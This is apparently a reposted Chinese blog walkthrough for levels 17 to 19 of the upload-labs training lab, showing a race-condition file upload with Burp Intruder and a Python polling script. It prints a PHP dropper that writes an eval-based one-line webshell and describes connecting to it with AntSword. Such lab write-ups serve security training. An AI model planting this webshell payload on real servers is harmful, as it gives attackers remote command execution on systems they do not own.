当前位置: 首页 > news >正文

upload-labs-master通关攻略(17~19)

news 2025/3/12 12:56:46

Pass-17

 创建3.php

代码意思是将一句话木马写入webshell.php中

 将3.php放入

 上传时抓包发送到攻击器

清除payload位置

 设计攻击属性

 使用python写一个脚本,当ok时代表webshell.php被创建出来

//脚本,记得修改ip和文件名
import requests
url = "http://x.x.x.x/upload-labs/upload/demo.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
        print("NO")

 攻击和脚本同时启动

 webshell.php创建后就可以用蚁剑连接

Pass-18

 将代码修改一下(Pass-16)

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?> 

 将修改后的文件放入

 之后就和17关一模一样

 Pass-19

 创建1.php

<?php phpinfo();?>

 上传后得到

打开图显示 


http://www.mrgr.cn/news/94055.html

相关文章:

  • 瑞芯微RK3576(1)-硬件设计
  • DeepIn Wps 字体缺失问题
  • 暑期第一面oωo, TME一面面经
  • Linux上位机开发实战(x86和arm自由切换)
  • 【性能测试】Jmeter如何做一份测试报告(3)
  • 大模型架构记录3-1-Gradio 入门
  • 【FreeRTOS】FreeRTOS操作系统在嵌入式单片机上裸机移植
  • Maven的依赖管理
  • ubuntu 解决 DNS 代理设置错误,导致不能上网的 DoH、DoT问题
  • 统计登录系统10秒内连续登录失败超过3次的用户
  • 基于redisson实现接口幂等性
  • Jenkins链接私有仓库Failed to connect to repository,stderr: No ECDSA...的问题
  • bootloader相关部分
  • 通道注意力机制、空间注意力机制、混合注意力机制
  • 【Spring 事务】
  • PySide(PyQT),QGraphicsRectItem的setPos()和setRect()的坐标位置的区别
  • 【WRF-Urban】使用 LCZ 替换 WRF 运行中的 LUCC 数据
  • 【Yonghong 企业日常问题07 】 东方通TongWeb替代Tomcat的实战指南!
  • 如何使用logrotete定时切割mysql的慢日志
  • Android DUKPT - 3DES